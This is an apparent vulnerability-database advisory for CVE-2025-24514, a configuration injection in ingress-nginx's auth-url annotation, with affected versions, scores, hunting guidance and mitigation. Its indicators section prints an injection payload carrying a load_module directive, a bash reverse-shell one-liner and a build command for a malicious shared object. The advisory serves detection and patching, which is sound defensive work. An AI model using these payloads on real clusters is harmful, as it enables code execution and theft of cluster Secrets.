CVE-2025-24514
published 2025-03-25


Priority: P273, high
CVSS 3.1 base score: 8.8
CVSS vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Flags: EXPLOIT
EPSS: 31.81% (98.1th percentile)
A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-url` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)

Affected

5 ranges
Vendor      Product                   Version range                 Fixed in
k8s.io      ingress-nginx             >= 0, < 1.11.5                1.11.5
k8s.io      ingress-nginx             >= 1.12.0-beta.0, < 1.12.1    1.12.1
kubernetes  ingress-nginx             <= 1.11.4
kubernetes  ingress-nginx
msrc        azure_kubernetes_service

Detection & IOCs (extracted from sources)

port: 8443
command: POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"kind": "AdmissionReview", "apiVersion": "admission.k8s.io/v1", ..."nginx.ingress.kubernetes.io/auth-url": "http://example.com#;load_module test;\n"...}
ua: qmx-ingress-exploiter
filename: evil_engine.so
filename: evil_engine.c
url: /admission
command: bash -c 'bash -i >& /dev/tcp/HOST/PORT 0>&1'
command: gcc -fPIC -Wall -shared -o evil_engine.so evil_engine.c -lcrypto
  • Hunt for anomalous processes spawned from the ingress-nginx controller pod, specifically nginx processes executing with '-t' flag against a temporary config file, which indicates config validation abuse.
  • Detect behavioral indicators in the ingress-nginx namespace to identify exploitation attempts.
  • Monitor outbound IP connections from ingress-nginx pods to detect post-exploitation C2 or reverse shell activity.
  • Detect unauthenticated AdmissionReview POST requests sent directly to the admission controller endpoint (port 8443) from non-API-server sources, especially containing the auth-url annotation with injection payloads like load_module directives.
  • Match HTTP responses from the admission controller containing all of 'AdmissionReview', 'directive is not allowed here' and 'load_module' to confirm that an injection attempt was processed.
  • Flag anomalous shared library loads within the ingress-nginx controller pod, which may indicate exploitation via the load_module injection technique.
  • Use Shodan to identify publicly exposed ingress-nginx admission controllers for attack surface enumeration.
  • Detect exploit tool activity by hunting for the User-Agent string 'qmx-ingress-exploiter' in HTTP logs.
  • Monitor for brute-force enumeration of /proc/{pid}/fd/{fd} paths in admission controller requests, a technique used to locate uploaded malicious shared objects in memory.
  • The admission controller is accessible over the network without authentication by default, making it reachable from any pod in the cluster without credentials.
  • The vulnerability is specifically in the auth-url annotation handling: the $externalAuth.URL value is incorporated into the NGINX config without proper sanitization.
  • Affected versions include all versions prior to v1.11.0, versions v1.11.0 through v1.11.4, and version v1.12.0. Fixed in v1.11.5 and v1.12.1.
  • Disabling the admission controller (controller.admissionWebhooks.enabled=false) is a temporary mitigation but removes important safeguards; re-enable after patching.

CVSS provenance

Source         Version  Score  Severity  Vector
nvd            v3.1     8.8    HIGH      CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vendor_msrc             8.8    HIGH
vendor_redhat           8.8    HIGH